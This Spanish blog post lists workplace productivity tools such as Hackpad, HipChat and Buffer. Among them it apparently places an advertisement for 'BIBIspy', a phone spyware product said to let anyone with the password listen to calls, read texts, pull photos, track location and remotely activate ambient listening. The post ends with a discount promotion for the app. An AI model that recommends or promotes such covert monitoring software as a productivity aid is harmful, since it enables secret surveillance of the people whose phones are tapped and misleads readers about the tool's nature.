9 herramientas útiles para aumentar la productividad en el trabajo

 o con tu equipo. Atención: esta lista contiene auténticas perlas:

iDone

https://idonethis.com/

Esta herramienta envía una nota todas las tardes a tus empleados: así sabrán que han de meter en la aplicación lo que han hecho durante la jornada. Una herramienta útil sin duda ya que permite ver de un sólo vistazo el trabajo de cada uno de los miembros del equipo. Cada uno puede darle al me gusta o comentar la actividad de los demás. Las sugerencias harán que los empleados se vean impulsados a mejorar.

Hackpad

https://hackpad.com/

Otra genial herramienta. Por decirlo de forma rápida: es una tratamiento de textos colectivo: un miembro del equipo empieza a elaborar un texto (lista, proyecto) y lo comparte con quién quiere. Éstos podrán modificar el texto o documento y de esta forma siempre estará actualizado en tiempo real. Otros detalles hacen de Hackpad una herramienta verdaderamente útil:

  1. • El documento se envía por email automáticamente a las personas que no están conectadas y de esta forma podrán estar al corriente de las modificaciones.
  2. • El programa añade automáticamente una tabla con las materias del documento
  3. • Se le pueden añadir fácilmente una lista de cosas que cada uno podrá añadir o tachar
  4. • Compatible con smartphones y tablets
  5. • Integra los vídeos de Youtube mediante un simple copiar y pegar del sitio

BIBIspy

https://espiarunmovil.es/software-spybubble/

Este programa se instala en el smartphone de la empresa o en la tablet. Todos los que tengan la contraseña podrán conectarse desde su ordenador a la cuenta de BIBIspy y acceder a los mandos del teléfono:

  1. • escuchar sus llamadas de teléfono
  2. • leer sus sms y mensajes de texto
  3. • recuperar las fotos tomadas por el teléfono
  4. • geolocalizar el teléfono
  5. • también se pueden realizar otras funciones avanzadas como por ejemplo el activamiento a distancia de la escucha ambiental.

Herramientas utiles

Sparkcentral

http://www.sparkcentral.com/

Permite entre otras cosas repatriar los twits que te envían y disponer de ellos convirtiéndolos en emails. De esta forma es mucho más fácil responderlos. El sistema corta los twits de respuesta si se pasan de los 140 caracteres autorizados y añade automáticamente el nombre de la persona que responde al final del tweet. Esta herramienta es muy útil puesto que indica cuando un miembro del equipo está respondiendo a un twit y de esta forma se evita que varios sujetos estén realizando la misma acción.

Si utilizas Twitter como soporte post-venta, sin duda te interesará esta herramienta.

Help Scout

https://www.helpscout.net/

Otra herramienta de apoyo. Repatría de manera indetectable los correos elecrónicos de los clientes hacia una interfaz determinada. La herramienta es práctica porque tus empleados pueden responder a algunos de esos correos y de esta forma se aumenta la rapidez de respuesta. La herramienta permite también comentar y evaluar las respuestas. Permite marcar los correos electrónicos de los clientes para poderlos reconocer fácilmente. Por último, también permite atribuir correos a un determinado miembro del equipo, por ejemplo a todos los correos seleccionados del blog.

HipChat

https://www.hipchat.com/

Chat colectivo que permite chatear entre todos los miembros del equipo. La particularidad es que HipChat autoriza la apertura de chats reducidos que sólo cuentan con algunos miembros o incluso conversaciones individuales. Si tienes otros medios de comunicar u otros programas, puedes integrarlos en HipChat con ayuda de la aplicaciónZapier, precisamente concebida para superponer entre ellas numerosas aplicaciones. Así HipChat podrá convertirse en tu plataforma central de comunicación, oral y escrita, entre todos tus empleados al tiempo que te señala los datos recuperados por otras aplicaciones.

Muy fuerte.

Sqwiggle

https://www.squiggle.com/

Herramienta esta vez de video chat. Toma fotos de los miembros de tu equipo (por webcam) cada poco tiempo. De esta forma dispondrás de un tablero con los miembros de tu equipo: clica sobre una de las caras y podrás comunicarte con esa persona a través de videoconferencia, o también si lo deseas, con varios miembros a la vez.

Si varios miembros del equipo se comunican entre ellos, sus fotos se iluminan y de esta forma se puede saber de qué hablan.

Permite convertir la comunicación en algo fácil y lúdico.

Buffer

http://bufferapp.com/

Me encanta esta herramienta que permite compartir fácilmente el contenido que desees sobre tus páginas de Facebook, Twitter, Google+, Linkedln o App.net incluso aunque tengas varias cuentas. Su integración al conjunto es eficaz y te permitirá compartir el contenido con un simple clic sobre una página. Permite también el envío de imágenes, permite planificar los envíos a horas determinadas o contabilizar la eficacia de tus archivos compartidos a través de una herramienta estadística.

Trillian

https://www.trillian.im/

Mensajería instantánea compatible avec Skype, Gmail, Twitter, Facebook etc.

Ver también: 5 aplicaciones de dibujo para iPad

Tre Fleccia

flagrante-delito

Bibispy es la aplicación de monitoreo más efectiva.

A través de este enlace promocional, obtendrá un 22% de descuento.

Pruébelo!

{ 0 comentarios… add one }

Deja un comentario

Next Post:

Previous Post:

Pin It on Pinterest

Share This